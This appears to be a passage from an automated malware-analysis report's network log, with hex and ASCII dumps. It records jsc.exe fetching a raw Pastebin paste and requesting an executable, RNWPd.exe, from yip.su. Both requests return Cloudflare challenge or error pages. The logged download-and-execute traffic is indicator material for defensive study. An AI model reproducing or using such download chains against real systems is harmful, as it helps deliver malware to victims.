                                    2024-08-17 22:11:52 UTC1369INData Raw: 33 64 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3de7<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:11:52 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:11:52 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:11:52 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:11:52 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:11:52 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:11:52 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:11:52 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 32 31 39 38 34 27 2c 63 52 61 79 3a 20 27 38 62 34 64 30 30 39 61 30 38 66 64 34 31 62 61 27 2c 63 48 61 73 68 3a 20 27 63 39 65 63 34 38 66 61 65 35 65 39 63 38 61 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 71 50 30 5a 68 79 5a 4a 70 57 39 6b 4d 37 41 61 34 48 45 7a 4f 66 33 4b 52 42 74 39 46 71 51 31 44 66 41 32 78 32 2e 47 45 42 77 2d 31 37 32 33 39 33 32 37 31 32 2d 30 2e 30 2e 31 2e 31 2d 34 31 31 36 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '21984',cRay: '8b4d009a08fd41ba',cHash: 'c9ec48fae5e9c8a',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=qP0ZhyZJpW9kM7Aa4HEzOf3KRBt9FqQ1DfA2x2.GEBw-1723932712-0.0.1.1-4116",cFPWv: 'g',cTTim
                                    2024-08-17 22:11:52 UTC1369INData Raw: 47 62 6b 38 69 6f 39 4f 51 32 31 4b 35 44 58 37 32 58 59 6d 5a 48 51 4d 34 34 4a 42 37 71 51 44 4c 63 30 4d 4d 52 36 51 31 58 57 61 30 2e 46 7a 75 63 4f 63 31 57 4f 6d 38 78 5a 43 69 39 36 4f 45 56 36 78 57 41 50 76 54 66 6e 75 74 6f 47 6e 4d 79 74 49 57 66 62 6d 55 62 61 38 50 2e 71 68 77 64 5a 39 72 37 5a 31 73 70 53 37 37 32 4b 6a 56 4d 6f 43 35 31 50 39 4d 49 36 6f 64 55 73 41 45 6f 73 6e 6c 73 69 59 79 65 4d 48 37 72 68 55 52 73 70 59 62 4f 6e 73 73 67 71 43 5a 65 76 48 6f 48 2e 6a 75 4c 4a 54 5f 30 2e 46 5a 74 54 70 74 49 71 39 58 58 46 70 5f 62 6b 6b 53 64 78 74 77 77 66 64 39 51 7a 6a 47 44 72 52 56 57 39 70 54 42 6b 6a 61 47 6b 51 65 65 67 54 55 47 75 56 6c 43 46 5a 6e 36 43 64 54 59 45 61 4d 53 30 45 54 66 4f 4d 42 54 5a 61 52 54 4d 68 61 72 70
                                    Data Ascii: Gbk8io9OQ21K5DX72XYmZHQM44JB7qQDLc0MMR6Q1XWa0.FzucOc1WOm8xZCi96OEV6xWAPvTfnutoGnMytIWfbmUba8P.qhwdZ9r7Z1spS772KjVMoC51P9MI6odUsAEosnlsiYyeMH7rhURspYbOnssgqCZevHoH.juLJT_0.FZtTptIq9XXFp_bkkSdxtwwfd9QzjGDrRVW9pTBkjaGkQeegTUGuVlCFZn6CdTYEaMS0ETfOMBTZaRTMharp


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    79192.168.2.549807104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:56 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:57 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:11:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4d00b90a5c42de-EWR
                                    2024-08-17 22:11:57 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:11:57 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:11:57 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:11:57 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:11:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    80192.168.2.549808188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:57 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:57 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:11:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:11:57 UTC685INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 62 52 70 74 51 75 42 46 51 49 59 38 34 6d 7a 4d 4b 66 4f 4e 67 50 61 75 37 35 4c 6f 30 74 73 55 4a 42 65 45 37 34 6e 30 78 68 5a 4c 74 36 6c 4d 65 49 71 69 70 58 44 44 5a 48 68 54 42 71 6b 57 2f 53 76 38 61 2f 31 4f 41 55 61 70 34 46 68 36 4c 68 41 53 6e 75 70 5a 4d 54 4e 6c 70 44 78 61 49 54 70 33 42 79 43 74 47 46 6f 3d 24 55 54 76 6e 41 50 53 32 2b 37 33 55 70 68 6c 74 47 63 43 2b 68 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: bRptQuBFQIY84mzMKfONgPau75Lo0tsUJBeE74n0xhZLt6lMeIqipXDDZHhTBqkW/Sv8a/1OAUap4Fh6LhASnupZMTNlpDxaITp3ByCtGFo=$UTvnAPS2+73UphltGcC+hw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:11:57 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:11:57 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:11:57 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
